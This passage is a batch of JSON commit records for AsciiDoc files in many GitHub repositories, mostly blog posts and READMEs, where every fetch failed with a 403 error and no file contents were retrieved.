2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-and-bridge-20.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-and-bridge-20.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-and-bridge-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae8a9994819ea3c28af3a9edff6669146cbb0a95","subject":"Update 2016-04-15-S-Q-L-Injection-Intermedio.adoc","message":"Update 2016-04-15-S-Q-L-Injection-Intermedio.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-S-Q-L-Injection-Intermedio.adoc","new_file":"_posts\/2016-04-15-S-Q-L-Injection-Intermedio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b747ab277d0fea782a6545b9bcb694494bbbc49","subject":"Update 2017-06-03-Vue20-ElementUI-Pge-Helper.adoc","message":"Update 2017-06-03-Vue20-ElementUI-Pge-Helper.adoc","repos":"tjfy1992\/tjfy1992.github.io,tjfy1992\/tjfy1992.github.io,tjfy1992\/tjfy1992.github.io,tjfy1992\/tjfy1992.github.io","old_file":"_posts\/2017-06-03-Vue20-ElementUI-Pge-Helper.adoc","new_file":"_posts\/2017-06-03-Vue20-ElementUI-Pge-Helper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tjfy1992\/tjfy1992.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb7e050ce293bd676873494256d04d43a9acf9a7","subject":"job #12330 drafting xtUML spec","message":"job #12330 drafting xtUML spec\n","repos":"xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint","old_file":"doc-bridgepoint\/notes\/12330_textual_xtuml.adoc","new_file":"doc-bridgepoint\/notes\/12330_textual_xtuml.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortlandstarrett\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"175c5a15815a5a44cba660efd4a86c91f632b780","subject":"doc: implementers: fix link to modules list","message":"doc: implementers: fix link to modules list\n\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nReviewed-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\n","repos":"ravineet-singh\/odp,rsalveti\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,nmorey\/odp,nmorey\/odp,erachmi\/odp,rsalveti\/odp,erachmi\/odp,mike-holmes-linaro\/odp,nmorey\/odp,dkrot\/odp,ravineet-singh\/odp,erachmi\/odp,dkrot\/odp,nmorey\/odp,rsalveti\/odp,erachmi\/odp,dkrot\/odp,dkrot\/odp,ravineet-singh\/odp,rsalveti\/odp,mike-holmes-linaro\/odp,rsalveti\/odp,mike-holmes-linaro\/odp","old_file":"doc\/implementers-guide\/implementers-guide.adoc","new_file":"doc\/implementers-guide\/implementers-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"8f61ac1a6cdc1c9b00237e1a1f26e947d5b26e58","subject":"Install AdoptOpenJDK","message":"Install AdoptOpenJDK\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d514a876228fe642f4a4520d98f77c10a9200f90","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00f8af62f49f09f9514709505f1ffa4d746cbd45","subject":"Update 2017-04-22-Hello-world.adoc","message":"Update 2017-04-22-Hello-world.adoc","repos":"bithunshal\/shalsblog,bithunshal\/shalsblog,bithunshal\/shalsblog,bithunshal\/shalsblog","old_file":"_posts\/2017-04-22-Hello-world.adoc","new_file":"_posts\/2017-04-22-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bithunshal\/shalsblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b69f23b82ef66600d509ecf16927479d42a37629","subject":"Update 2019-01-31-Cyber-Exile.adoc","message":"Update 2019-01-31-Cyber-Exile.adoc","repos":"netrunnerX\/netrunnerx.github.io,netrunnerX\/netrunnerx.github.io,netrunnerX\/netrunnerx.github.io,netrunnerX\/netrunnerx.github.io","old_file":"_posts\/2019-01-31-Cyber-Exile.adoc","new_file":"_posts\/2019-01-31-Cyber-Exile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netrunnerX\/netrunnerx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"abbc08d2d28fcd8f8ec39b126d54c8aaac59091f","subject":"Update 2019-02-10-RTFM-Part-1.adoc","message":"Update 2019-02-10-RTFM-Part-1.adoc","repos":"kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io","old_file":"_posts\/2019-02-10-RTFM-Part-1.adoc","new_file":"_posts\/2019-02-10-RTFM-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kr-b\/kr-b.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7d7a86c31cde828d40c4cfc71d222954542afc7","subject":"Update 2015-05-31-Formatierung.adoc","message":"Update 2015-05-31-Formatierung.adoc","repos":"teilautohall\/teilautohall.github.io,teilautohall\/teilautohall.github.io,teilautohall\/teilautohall.github.io","old_file":"_posts\/2015-05-31-Formatierung.adoc","new_file":"_posts\/2015-05-31-Formatierung.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/teilautohall\/teilautohall.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ae848e81a97b36b344a36ca33b9cd4610fff58e","subject":"Update 2016-12-1-re-Invent2016.adoc","message":"Update 2016-12-1-re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-1-re-Invent2016.adoc","new_file":"_posts\/2016-12-1-re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85e8e7d5c8e13148b7928209a86d67c53a6c4d80","subject":"Deleted _posts\/2016-03-20-douleurs-extremes-atterrissage-avion.adoc","message":"Deleted _posts\/2016-03-20-douleurs-extremes-atterrissage-avion.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-douleurs-extremes-atterrissage-avion.adoc","new_file":"_posts\/2016-03-20-douleurs-extremes-atterrissage-avion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"afb409d9dedd034a8a37f1cf41a0d4a73cf642da","subject":"Update 2017-01-20-Notice-of-holding-google-Apps-Script.adoc","message":"Update 2017-01-20-Notice-of-holding-google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-20-Notice-of-holding-google-Apps-Script.adoc","new_file":"_posts\/2017-01-20-Notice-of-holding-google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7271bd32dbd9ed9585b3a1e2d10c8b73e8228b22","subject":"Worked on Apple Unified Logging and Activity Tracing documentation","message":"Worked on Apple Unified Logging and Activity Tracing documentation\n\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/Apple Unified Logging and Activity Tracing formats.asciidoc","new_file":"documentation\/Apple Unified Logging and Activity Tracing formats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ffbabe88d4fe6c0d4af1a592dff8ae4cd22f2bb4","subject":"Blog: JPA Hibernate","message":"Blog: JPA Hibernate\n","repos":"oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"blog\/2015-08-23-IntegratingJpaHibernateWithOptaPlanner.adoc","new_file":"blog\/2015-08-23-IntegratingJpaHibernateWithOptaPlanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0612ce8c95b78c7547f5e00f28a5c20ddaa77f2a","subject":"Note: joining strings","message":"Note: joining strings\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"389289e9d9eb74c937f2b4cd80b42497e7812434","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/06\/10\/deref.adoc","new_file":"content\/news\/2022\/06\/10\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9b61607ddc635778a2816eea11eb96aab5066235","subject":"create post The Most Requested Smartphone I've NEVER Featured...","message":"create post The Most Requested Smartphone I've NEVER Featured...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-The-Most-Requested-Smartphone-Ive-NEVER-Featured....adoc","new_file":"_posts\/2018-02-26-The-Most-Requested-Smartphone-Ive-NEVER-Featured....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d96a598de529e102c312afb630f1db15b5ce005","subject":"Update 2016-11-10.adoc","message":"Update 2016-11-10.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/2016-11-10.adoc","new_file":"_posts\/2016-11-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f175cfe29ec2bbfbe43caa71127437586903945","subject":"New table test with equal table cells.","message":"New table test with equal table cells.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/particle_emitters4.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/particle_emitters4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"be453f247b7677e31acc8024007e770e1b779b2d","subject":"add README","message":"add README\n","repos":"pwoolcoc\/cargo-template","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pwoolcoc\/cargo-template.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0e27e584493bbdbfb1d138bf1acd53bdcf29dda0","subject":"Create README.adoc","message":"Create README.adoc","repos":"jvissers\/itwercks","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jvissers\/itwercks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"60dfda8a0b38d15010bc89f02628ef5ace9ce1b9","subject":"Create README.adoc","message":"Create README.adoc","repos":"flowdev\/website,flowdev\/website","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flowdev\/website.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dceebdcc1ff32de8c4c2978181485c040db1f0b","subject":"add new format readme","message":"add new format readme","repos":"iCok\/FindElementInFrames,iCok\/FindElementInFrames,iCok\/FindElementInFrames","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iCok\/FindElementInFrames.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae5e2d80578dc5ec23923286c171285cc838c7c7","subject":"Create README.adoc","message":"Create README.adoc","repos":"inadarei\/uber.client.js","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/inadarei\/uber.client.js.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e096e1090b872caa45bafc163e6ff2c229533b1a","subject":"Update 2011-11-21-0901-Ameliorer-la-securite-du-developpement-avec-Git.adoc","message":"Update 2011-11-21-0901-Ameliorer-la-securite-du-developpement-avec-Git.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2011-11-21-0901-Ameliorer-la-securite-du-developpement-avec-Git.adoc","new_file":"_posts\/2011-11-21-0901-Ameliorer-la-securite-du-developpement-avec-Git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"645d132b009d9d1f9269239b327ede688d5e7122","subject":"Lab 03 instructor notes","message":"Lab 03 instructor notes\n","repos":"dm-academy\/aitm-labs,AshirwadShrestha\/aitm-labs,dm-academy\/aitm-labs,AshirwadShrestha\/aitm-labs,dm-academy\/aitm-labs","old_file":"Lab-03\/03-instructor-notes.adoc","new_file":"Lab-03\/03-instructor-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dm-academy\/aitm-labs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d1de4232d483acda3e044eb24988c8fdd6afe44","subject":"Update 2015-04-15-Que-vous-apporte-un-outil-APM.adoc","message":"Update 2015-04-15-Que-vous-apporte-un-outil-APM.adoc","repos":"yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io","old_file":"_posts\/2015-04-15-Que-vous-apporte-un-outil-APM.adoc","new_file":"_posts\/2015-04-15-Que-vous-apporte-un-outil-APM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yoanndupuy\/yoanndupuy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8458abd9a4f0fae12e004aaff963e830ae79c0c1","subject":"y2b create post Unboxing The $20,000 Smartphone","message":"y2b create post Unboxing The $20,000 Smartphone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-25-Unboxing-The-20000-Smartphone.adoc","new_file":"_posts\/2016-12-25-Unboxing-The-20000-Smartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6961ec54e9980eff91b495c646c8bbd664eadb06","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"951721f17584c92ae5a32cf3aed823e326ce52e9","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b9d2a210998104caaa538d085a928edb91752c4","subject":"Update 2017-02-24-Google-Extention.adoc","message":"Update 2017-02-24-Google-Extention.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Google-Extention.adoc","new_file":"_posts\/2017-02-24-Google-Extention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28217eaa4b9710e74a5b2b604de049e9882303da","subject":"Update 2016-12-11-S-P00-December-Seasonality.adoc","message":"Update 2016-12-11-S-P00-December-Seasonality.adoc","repos":"mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io","old_file":"_posts\/2016-12-11-S-P00-December-Seasonality.adoc","new_file":"_posts\/2016-12-11-S-P00-December-Seasonality.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mattpearson\/mattpearson.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"899d06fe0e1b314ab3ceb0a9e609e94779c8383d","subject":"Adds instruction on how to upgrade Font Awesome","message":"Adds instruction on how to upgrade Font Awesome\n","repos":"asciidoctor\/asciidoctor-firefox-addon","old_file":"contributing-code.adoc","new_file":"contributing-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/asciidoctor-firefox-addon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a648fd4c371b64fcee3965ea77f2182ad1cdba62","subject":"Translation of progress course module","message":"Translation of progress course module\n","repos":"skoba\/mml,skoba\/mml","old_file":"doc\/MML4\/doc_e\/progress_course.adoc","new_file":"doc\/MML4\/doc_e\/progress_course.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skoba\/mml.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c4332446490352c282351f8d4b5eb25edf28bc04","subject":"Heroku driven architecture: initial thoughts.","message":"Heroku driven architecture: initial thoughts.\n","repos":"crispab\/codekvast,crispab\/codekvast,crispab\/codekvast,crispab\/codekvast,crispab\/codekvast,crispab\/codekvast","old_file":"product\/docs\/src\/docs\/asciidoc\/HerokuDrivenArchitecture.adoc","new_file":"product\/docs\/src\/docs\/asciidoc\/HerokuDrivenArchitecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crispab\/codekvast.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ac30fb80b5f64a92d866a20b579a80b526da469","subject":"Update 2016-06-02-Word-Press-2.adoc","message":"Update 2016-06-02-Word-Press-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4a17383a7c1571b3a4846f75e30ce49c051bb59","subject":"Update 2017-01-21-Intersection.adoc","message":"Update 2017-01-21-Intersection.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-01-21-Intersection.adoc","new_file":"_posts\/2017-01-21-Intersection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c9b70cfcb64504a1c5f6684b67a1da803dc5b50","subject":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a9264eb574bf127b7477d7409938a39d865d7c6","subject":"[SDF] Add sdf documentation","message":"[SDF] Add sdf documentation\n","repos":"arago\/OGIT,arago\/OGIT,arago\/OGIT","old_file":"SDF\/README.adoc","new_file":"SDF\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arago\/OGIT.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a405bd27280b801bd05c5689dc87aa3ed73aaa0","subject":"Update YubiKey_and_FreeRADIUS_via_PAM.adoc","message":"Update YubiKey_and_FreeRADIUS_via_PAM.adoc","repos":"madrat-\/yubico-pam,Yubico\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,Yubico\/yubico-pam","old_file":"doc\/YubiKey_and_FreeRADIUS_via_PAM.adoc","new_file":"doc\/YubiKey_and_FreeRADIUS_via_PAM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"562b660926554b8eecac2af153b2722638cfcd00","subject":"index.adoc updated","message":"index.adoc updated","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6a6af67cd9869693e32918c3b8f3491c2b0ce4dc","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e900d9792dfafb2ffefbb27fddff45a9ec99025b","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd6737e377e6c7780c7d288519471a4cf20b7d31","subject":"Update 2015-08-06-Developers-prepare-your-app-to-git-clone-docker-compose-up-pattern.adoc","message":"Update 2015-08-06-Developers-prepare-your-app-to-git-clone-docker-compose-up-pattern.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-Developers-prepare-your-app-to-git-clone-docker-compose-up-pattern.adoc","new_file":"_posts\/2015-08-06-Developers-prepare-your-app-to-git-clone-docker-compose-up-pattern.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8caa9a133882fb029609b6d3b4cd801203a8d856","subject":"hello security","message":"hello 